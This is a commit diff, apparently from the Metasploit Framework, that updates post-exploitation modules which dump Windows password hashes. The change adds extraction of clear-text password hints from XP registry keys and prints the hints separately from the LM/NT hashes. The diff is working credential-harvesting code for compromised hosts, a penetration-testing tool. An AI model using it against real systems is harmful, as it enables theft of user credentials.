Added XP Support and Changed Output Method for User Password Hints
1.) Now grabs clear-text user hint from XP systems in addition to Win7/Win8 systems 2.) Changes output so it's no longer inline with hashes as not to affect copy/paste of hashes output 3.) Adding alternate text in cases when no user hints are availableunstable
Jonathan Claudius
parent
fbc36b57d0
commit
a3bad0b3ae
|
|
@ -74,6 +74,19 @@ class Metasploit3 < Msf::Post
|
|||
print_status("Decrypting user keys...")
|
||||
users = decrypt_user_keys(hbootkey, users)
|
||||
|
||||
print_status("Dumping password hints...")
|
||||
print_line()
|
||||
hint_count = 0
|
||||
users.keys.sort{|a,b| a<=>b}.each do |rid|
|
||||
#If we have a hint then print it
|
||||
if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
|
||||
print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
|
||||
hint_count += 1
|
||||
end
|
||||
end
|
||||
print_line "No users with password hints on this system" if hint_count == 0
|
||||
print_line()
|
||||
|
||||
print_status("Dumping password hashes...")
|
||||
print_line()
|
||||
print_line()
|
||||
|
|
@ -88,11 +101,6 @@ class Metasploit3 < Msf::Post
|
|||
:type => "smb_hash"
|
||||
)
|
||||
|
||||
#If we have a hint, decode and add to the hashstring
|
||||
if !users[rid][:UserPasswordHint].nil?
|
||||
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
|
||||
end
|
||||
|
||||
print_line hashstring
|
||||
end
|
||||
print_line()
|
||||
|
|
@ -171,6 +179,7 @@ class Metasploit3 < Msf::Post
|
|||
users[usr.to_i(16)][:F] = uk.query_value("F").data
|
||||
users[usr.to_i(16)][:V] = uk.query_value("V").data
|
||||
|
||||
#Attempt to get Hints (from Win7/Win8 Location)
|
||||
begin
|
||||
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
|
|
@ -188,6 +197,17 @@ class Metasploit3 < Msf::Post
|
|||
rid = r.type
|
||||
users[rid] ||= {}
|
||||
users[rid][:Name] = usr
|
||||
|
||||
#Attempt to get Hints (from WinXP Location) only if it's not set yet
|
||||
if users[rid][:UserPasswordHint].nil?
|
||||
begin
|
||||
uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
|
||||
users[rid][:UserPasswordHint] = uk_hint.query_value("").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
users[rid][:UserPasswordHint] = nil
|
||||
end
|
||||
end
|
||||
|
||||
uk.close
|
||||
end
|
||||
ok.close
|
||||
|
|
|
|||
|
|
@ -141,6 +141,7 @@ class Metasploit3 < Msf::Post
|
|||
users[usr.to_i(16)][:F] = uk.query_value("F").data
|
||||
users[usr.to_i(16)][:V] = uk.query_value("V").data
|
||||
|
||||
#Attempt to get Hints (from Win7/Win8 Location)
|
||||
begin
|
||||
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
|
|
@ -158,6 +159,17 @@ class Metasploit3 < Msf::Post
|
|||
rid = r.type
|
||||
users[rid] ||= {}
|
||||
users[rid][:Name] = usr
|
||||
|
||||
#Attempt to get Hints (from WinXP Location) only if it's not set yet
|
||||
if users[rid][:UserPasswordHint].nil?
|
||||
begin
|
||||
uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
|
||||
users[rid][:UserPasswordHint] = uk_hint.query_value("").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
users[rid][:UserPasswordHint] = nil
|
||||
end
|
||||
end
|
||||
|
||||
uk.close
|
||||
end
|
||||
ok.close
|
||||
|
|
@ -290,20 +302,24 @@ class Metasploit3 < Msf::Post
|
|||
print_status("\tDecrypting user keys...")
|
||||
users = decrypt_user_keys(hbootkey, users)
|
||||
|
||||
print_status("\tDumping password hashes...")
|
||||
print_status("\tDumping password hints...")
|
||||
hint_count = 0
|
||||
users.keys.sort{|a,b| a<=>b}.each do |rid|
|
||||
#If we have a hint then print it
|
||||
if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
|
||||
print_good("#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\"")
|
||||
hint_count += 1
|
||||
end
|
||||
end
|
||||
print_good("No users with password hints on this system") if hint_count == 0
|
||||
|
||||
print_status("\tDumping password hashes...")
|
||||
users.keys.sort{|a,b| a<=>b}.each do |rid|
|
||||
# next if guest account or support account
|
||||
next if rid == 501 or rid == 1001
|
||||
collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
|
||||
|
||||
#If we have a hint, decode and populate hint_string
|
||||
hint_string = ""
|
||||
if !users[rid][:UserPasswordHint].nil?
|
||||
hint_string += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
|
||||
end
|
||||
|
||||
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::#{hint_string}")
|
||||
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
|
||||
session.framework.db.report_auth_info(
|
||||
:host => host,
|
||||
:port => @smb_port,
|
||||
|
|
@ -313,8 +329,7 @@ class Metasploit3 < Msf::Post
|
|||
:type => "smb_hash"
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::Post::Meterpreter::RequestError => e
|
||||
|
|
|
|||
|
|
@ -102,8 +102,9 @@ def capture_user_keys
|
|||
users[usr.to_i(16)][:F] = uk.query_value("F").data
|
||||
users[usr.to_i(16)][:V] = uk.query_value("V").data
|
||||
|
||||
#Attempt to get Hints (from Win7/Win8 Location)
|
||||
begin
|
||||
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
|
||||
users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
users[usr.to_i(16)][:UserPasswordHint] = nil
|
||||
end
|
||||
|
|
@ -119,6 +120,17 @@ def capture_user_keys
|
|||
rid = r.type
|
||||
users[rid] ||= {}
|
||||
users[rid][:Name] = usr
|
||||
|
||||
#Attempt to get Hints (from WinXP Location) only if it's not set yet
|
||||
if users[rid][:UserPasswordHint].nil?
|
||||
begin
|
||||
uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
|
||||
users[rid][:UserPasswordHint] = uk_hint.query_value("").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
users[rid][:UserPasswordHint] = nil
|
||||
end
|
||||
end
|
||||
|
||||
uk.close
|
||||
end
|
||||
ok.close
|
||||
|
|
@ -242,6 +254,19 @@ if client.platform =~ /win32|win64/
|
|||
print_status("Decrypting user keys...")
|
||||
users = decrypt_user_keys(hbootkey, users)
|
||||
|
||||
print_status("Dumping password hints...")
|
||||
print_line()
|
||||
hint_count = 0
|
||||
users.keys.sort{|a,b| a<=>b}.each do |rid|
|
||||
#If we have a hint then print it
|
||||
if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
|
||||
print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
|
||||
hint_count += 1
|
||||
end
|
||||
end
|
||||
print_line("No users with password hints on this system") if hint_count == 0
|
||||
print_line()
|
||||
|
||||
print_status("Dumping password hashes...")
|
||||
print_line()
|
||||
print_line()
|
||||
|
|
@ -256,11 +281,6 @@ if client.platform =~ /win32|win64/
|
|||
:type => "smb_hash"
|
||||
)
|
||||
|
||||
#If we have a hint, decode and add to the hashstring
|
||||
if !users[rid][:UserPasswordHint].nil?
|
||||
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
|
||||
end
|
||||
|
||||
print_line hashstring
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue